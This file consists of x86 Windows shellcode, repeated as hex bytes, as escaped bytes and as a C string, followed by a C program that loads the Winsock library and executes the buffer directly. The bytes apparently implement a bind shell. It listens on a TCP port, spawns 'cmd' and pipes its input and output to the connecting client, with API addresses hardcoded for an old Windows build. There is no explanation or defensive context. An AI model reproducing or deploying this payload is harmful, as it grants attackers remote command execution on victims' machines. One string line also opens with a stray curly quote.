55 83 EC 50 8B EC B8
27 D8 81 7C 89 45 04
B8 6B 23 80 7C 89 45
08 B8 17 08 86 7C 89
45 0C B8 17 0E 81 7C
89 45 10 B8 12 18 80
7C 89 45 14 B8 FA CA
81 7C 89 45 18 B8 55
6A A2 71 89 45 1C B8
11 42 A2 71 89 45 20 
B8 80 44 A2 71 89 45
24 B8 D3 8C A2 71 89
45 28 B8 40 10 A3 71
89 45 2C B8 27 4C A2
71 89 45 30 B8 6F 67
A2 71 89 45 34 B8 00
00 00 00 C6 45 38 00
C6 45 3C 00 C6 45 40
00 C6 45 44 00 C6 45
48 00 81 EC 90 01 00
00 54 68 02 02 00 00
FF 55 1C 6A 06 6A 01
6A 02 FF 55 20 8B D8
33 FF 57 57 B8 02 00
03 3E 50 8B F4 6A 10
56 53 FF 55 24 47 47
57 53 FF 55 28 6A 10
8D 3C 24 57 56 53 FF
55 2C 8B D8 33 FF 47
57 33 FF 57 6A 0C 8B
F4 57 56 8D 45 3C 50
8D 45 38 50 FF 55 04
57 56 8D 45 44 50 8D
45 40 50 FF 55 04 81
EC 80 00 00 00 8D 3C
24 33 C0 68 80 00 00
00 59 F3 AB 8D 3C 24
B8 01 01 00 00 89 47
2C 8B 45 40 89 47 38
8B 45 3C 89 47 3C 8B
45 3C 89 47 40 B8 63
6D 64 00 89 47 64 8D
44 24 44 50 57 51 51
51 41 51 49 51 51 8D
47 64 50 51 FF 55 08
81 EC 00 04 00 00 8B
F4 33 C9 51 51 8D 7D
48 57 B8 00 04 00 00
50 56 8B 45 38 50 FF
55 0C 8B 07 85 C0 74
19 33 C9 51 57 FF 37
56 FF 75 38 FF 55 14
33 C9 51 FF 37 56 53
FF 55 30 EB C3 33 C9
51 B8 00 04 00 00 50
56 53 FF 55 34 89 07
33 C9 51 57 FF 37 56
FF 75 44 FF 55 10 EB
A4




\x55\x83\xEC\x50\x8B\xEC\xB8
\x27\xD8\x81\x7C\x89\x45\x04
\xB8\x6B\x23\x80\x7C\x89\x45
\x08\xB8\x17\x08\x86\x7C\x89
\x45\x0C\xB8\x17\x0E\x81\x7C
\x89\x45\x10\xB8\x12\x18\x80
\x7C\x89\x45\x14\xB8\xFA\xCA
\x81\x7C\x89\x45\x18\xB8\x55
\x6A\xA2\x71\x89\x45\x1C\xB8
\x11\x42\xA2\x71\x89\x45\x20
\xB8\x80\x44\xA2\x71\x89\x45
\x24\xB8\xD3\x8C\xA2\x71\x89
\x45\x28\xB8\x40\x10\xA3\x71
\x89\x45\x2C\xB8\x27\x4C\xA2
\x71\x89\x45\x30\xB8\x6F\x67
\xA2\x71\x89\x45\x34\xB8\x00
\x00\x00\x00\xC6\x45\x38\x00
\xC6\x45\x3C\x00\xC6\x45\x40
\x00\xC6\x45\x44\x00\xC6\x45
\x48\x00\x81\xEC\x90\x01\x00
\x00\x54\x68\x02\x02\x00\x00
\xFF\x55\x1C\x6A\x06\x6A\x01
\x6A\x02\xFF\x55\x20\x8B\xD8
\x33\xFF\x57\x57\xB8\x02\x00
\x03\x3E\x50\x8B\xF4\x6A\x10
\x56\x53\xFF\x55\x24\x47\x47
\x57\x53\xFF\x55\x28\x6A\x10
\x8D\x3C\x24\x57\x56\x53\xFF
\x55\x2C\x8B\xD8\x33\xFF\x47
\x57\x33\xFF\x57\x6A\x0C\x8B
\xF4\x57\x56\x8D\x45\x3C\x50
\x8D\x45\x38\x50\xFF\x55\x04
\x57\x56\x8D\x45\x44\x50\x8D
\x45\x40\x50\xFF\x55\x04\x81
\xEC\x80\x00\x00\x00\x8D\x3C
\x24\x33\xC0\x68\x80\x00\x00
\x00\x59\xF3\xAB\x8D\x3C\x24
\xB8\x01\x01\x00\x00\x89\x47
\x2C\x8B\x45\x40\x89\x47\x38
\x8B\x45\x3C\x89\x47\x3C\x8B
\x45\x3C\x89\x47\x40\xB8\x63
\x6D\x64\x00\x89\x47\x64\x8D
\x44\x24\x44\x50\x57\x51\x51
\x51\x41\x51\x49\x51\x51\x8D
\x47\x64\x50\x51\xFF\x55\x08
\x81\xEC\x00\x04\x00\x00\x8B
\xF4\x33\xC9\x51\x51\x8D\x7D
\x48\x57\xB8\x00\x04\x00\x00
\x50\x56\x8B\x45\x38\x50\xFF
\x55\x0C\x8B\x07\x85\xC0\x74
\x19\x33\xC9\x51\x57\xFF\x37
\x56\xFF\x75\x38\xFF\x55\x14
\x33\xC9\x51\xFF\x37\x56\x53
\xFF\x55\x30\xEB\xC3\x33\xC9
\x51\xB8\x00\x04\x00\x00\x50
\x56\x53\xFF\x55\x34\x89\x07
\x33\xC9\x51\x57\xFF\x37\x56
\xFF\x75\x44\xFF\x55\x10\xEB
\xA4




"\x55\x83\xEC\x50\x8B\xEC\xB8\x27\xD8\x81\x7C\x89\x45\x04\xB8\x6B"
"\x23\x80\x7C\x89\x45\x08\xB8\x17\x08\x86\x7C\x89\x45\x0C\xB8\x17"
"\x0E\x81\x7C\x89\x45\x10\xB8\x12\x18\x80\x7C\x89\x45\x14\xB8\xFA"
"\xCA\x81\x7C\x89\x45\x18\xB8\x55\x6A\xA2\x71\x89\x45\x1C\xB8\x11"
"\x42\xA2\x71\x89\x45\x20\xB8\x80\x44\xA2\x71\x89\x45\x24\xB8\xD3"
"\x8C\xA2\x71\x89\x45\x28\xB8\x40\x10\xA3\x71\x89\x45\x2C\xB8\x27"
"\x4C\xA2\x71\x89\x45\x30\xB8\x6F\x67\xA2\x71\x89\x45\x34\xB8\x00"
"\x00\x00\x00\xC6\x45\x38\x00\xC6\x45\x3C\x00\xC6\x45\x40\x00\xC6"
"\x45\x44\x00\xC6\x45\x48\x00\x81\xEC\x90\x01\x00\x00\x54\x68\x02"
"\x02\x00\x00\xFF\x55\x1C\x6A\x06\x6A\x01\x6A\x02\xFF\x55\x20\x8B"
"\xD8\x33\xFF\x57\x57\xB8\x02\x00\x03\x3E\x50\x8B\xF4\x6A\x10\x56"
"\x53\xFF\x55\x24\x47\x47\x57\x53\xFF\x55\x28\x6A\x10\x8D\x3C\x24"
"\x57\x56\x53\xFF\x55\x2C\x8B\xD8\x33\xFF\x47\x57\x33\xFF\x57\x6A"
"\x0C\x8B\xF4\x57\x56\x8D\x45\x3C\x50\x8D\x45\x38\x50\xFF\x55\x04"
"\x57\x56\x8D\x45\x44\x50\x8D\x45\x40\x50\xFF\x55\x04\x81\xEC\x80"
"\x00\x00\x00\x8D\x3C\x24\x33\xC0\x68\x80\x00\x00\x00\x59\xF3\xAB"
"\x8D\x3C\x24\xB8\x01\x01\x00\x00\x89\x47\x2C\x8B\x45\x40\x89\x47"
"\x38\x8B\x45\x3C\x89\x47\x3C\x8B\x45\x3C\x89\x47\x40\xB8\x63\x6D"
"\x64\x00\x89\x47\x64\x8D\x44\x24\x44\x50\x57\x51\x51\x51\x41\x51"
"\x49\x51\x51\x8D\x47\x64\x50\x51\xFF\x55\x08\x81\xEC\x00\x04\x00"
"\x00\x8B\xF4\x33\xC9\x51\x51\x8D\x7D\x48\x57\xB8\x00\x04\x00\x00"
"\x50\x56\x8B\x45\x38\x50\xFF\x55\x0C\x8B\x07\x85\xC0\x74\x19\x33"
"\xC9\x51\x57\xFF\x37\x56\xFF\x75\x38\xFF\x55\x14\x33\xC9\x51\xFF"
"\x37\x56\x53\xFF\x55\x30\xEB\xC3\x33\xC9\x51\xB8\x00\x04\x00\x00"
"\x50\x56\x53\xFF\x55\x34\x89\x07\x33\xC9\x51\x57\xFF\x37\x56\xFF"
”\x75\x44\xFF\x55\x10\xEB\xA4"



#include <windows.h>

unsigned char ShellCode[] = 
"\x55\x83\xEC\x50\x8B\xEC\xB8\x27\xD8\x81\x7C\x89\x45\x04\xB8\x6B"
"\x23\x80\x7C\x89\x45\x08\xB8\x17\x08\x86\x7C\x89\x45\x0C\xB8\x17"
"\x0E\x81\x7C\x89\x45\x10\xB8\x12\x18\x80\x7C\x89\x45\x14\xB8\xFA"
"\xCA\x81\x7C\x89\x45\x18\xB8\x55\x6A\xA2\x71\x89\x45\x1C\xB8\x11"
"\x42\xA2\x71\x89\x45\x20\xB8\x80\x44\xA2\x71\x89\x45\x24\xB8\xD3"
"\x8C\xA2\x71\x89\x45\x28\xB8\x40\x10\xA3\x71\x89\x45\x2C\xB8\x27"
"\x4C\xA2\x71\x89\x45\x30\xB8\x6F\x67\xA2\x71\x89\x45\x34\xB8\x00"
"\x00\x00\x00\xC6\x45\x38\x00\xC6\x45\x3C\x00\xC6\x45\x40\x00\xC6"
"\x45\x44\x00\xC6\x45\x48\x00\x81\xEC\x90\x01\x00\x00\x54\x68\x02"
"\x02\x00\x00\xFF\x55\x1C\x6A\x06\x6A\x01\x6A\x02\xFF\x55\x20\x8B"
"\xD8\x33\xFF\x57\x57\xB8\x02\x00\x03\x3E\x50\x8B\xF4\x6A\x10\x56"
"\x53\xFF\x55\x24\x47\x47\x57\x53\xFF\x55\x28\x6A\x10\x8D\x3C\x24"
"\x57\x56\x53\xFF\x55\x2C\x8B\xD8\x33\xFF\x47\x57\x33\xFF\x57\x6A"
"\x0C\x8B\xF4\x57\x56\x8D\x45\x3C\x50\x8D\x45\x38\x50\xFF\x55\x04"
"\x57\x56\x8D\x45\x44\x50\x8D\x45\x40\x50\xFF\x55\x04\x81\xEC\x80"
"\x00\x00\x00\x8D\x3C\x24\x33\xC0\x68\x80\x00\x00\x00\x59\xF3\xAB"
"\x8D\x3C\x24\xB8\x01\x01\x00\x00\x89\x47\x2C\x8B\x45\x40\x89\x47"
"\x38\x8B\x45\x3C\x89\x47\x3C\x8B\x45\x3C\x89\x47\x40\xB8\x63\x6D"
"\x64\x00\x89\x47\x64\x8D\x44\x24\x44\x50\x57\x51\x51\x51\x41\x51"
"\x49\x51\x51\x8D\x47\x64\x50\x51\xFF\x55\x08\x81\xEC\x00\x04\x00"
"\x00\x8B\xF4\x33\xC9\x51\x51\x8D\x7D\x48\x57\xB8\x00\x04\x00\x00"
"\x50\x56\x8B\x45\x38\x50\xFF\x55\x0C\x8B\x07\x85\xC0\x74\x19\x33"
"\xC9\x51\x57\xFF\x37\x56\xFF\x75\x38\xFF\x55\x14\x33\xC9\x51\xFF"
"\x37\x56\x53\xFF\x55\x30\xEB\xC3\x33\xC9\x51\xB8\x00\x04\x00\x00"
"\x50\x56\x53\xFF\x55\x34\x89\x07\x33\xC9\x51\x57\xFF\x37\x56\xFF"
"\x75\x44\xFF\x55\x10\xEB\xA4";

int main()
{
	LoadLibrary("WS2_32.DLL");
	( (void(*)(void)) &ShellCode )();
	
	return 0;
}